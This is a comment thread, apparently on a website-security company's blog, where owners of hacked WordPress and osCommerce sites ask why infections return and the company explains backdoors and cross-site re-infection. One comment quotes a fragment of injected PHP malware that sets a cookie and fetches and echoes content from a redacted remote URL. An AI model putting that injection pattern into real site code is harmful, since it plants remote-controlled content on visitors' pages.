Each of my themes were infected as well as a number of files further up stream of it in the wordpress directory. Oddly not one .htaccess file is infected nor do I have any thumb.db files or the like.

I’ve since cleaned up every infected file I could find (used a regex powered search on every file). But am wondering why i am not finding the source to the problem. Could it be that this was purely opportunistic because I left myself open?

Anyway, permissions are reset to be less permissive and i changed my user password. will change all the other passwords (FTP etc…) soon enough.

In order to get this clean, you will have to search for all backdoors and remove them. There is no searching for just a few strings. It is now an exhaustive search.

What plugins do you have?

im having latest versions and latest plugins even though my site got hacked can u tell me the process how they hacked this one

@setcookie("stats",md5("stats"),time()+10800);
$evalsssgqulVBTkZLAch =@file_get_contents("http://??/in.php?i= &b=???&h="); //I still have to find out the exact URL.
if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
echo $evalsssgqulVBTkZLAch;

The code also creates a cookie by the name “stats”, which is used to set the URL (domain and parameters).

This happens in a number of ways.

First, often times a hacker will upload a “backdoor” script. This backdoor provides them with a filemanager like view. So everything you can see in your filemanager from your control panel, they have access to as well.

Second, when their (the hackers) script runs to infect files, it seeks out files in all accessible folders.

Quite often we see where the hackers will find a point of entry on one website in a hosting account, and they won’t infect that site but they will infect one of the other sites. They do this because they want you to spend all your time, energy and attention on the one that is infected. So you get it cleaned and then they re-infect it again and again.

Then they might infect one of the other sites in that hosting account and play the same game.

This is why we insist on cleaning all the websites in a hosting account and why are prices are lower on additional websites. Until you scan, clean and analyze all the websites in a hosting account, you’ll never know if you’re really clean.

There are no htacces infected files attached.

Do you think that is possible that they can enter from one vulnerable website to hack the other websites from the same hosting account?

Thanks!

If your site is built with osCommerce, there are a number of steps to follow to secure it.

Until you find that point of entry and remove it, your site will continually get infected.

Let us know if you need help.

The designer and host of my organization’s website has cleaned the website several times. But V!RUS.DZ keeps coming back. Our website is designed for teaching peace education. We are working with a large number of kids in an out of school to cultivate new lifestyle of peaceful co-existence,

I can understand why we are hated as peacemakers, peacebuilders, and peace teachers! We need our website for the work we do! We can we do to stop these hackers from Algeria!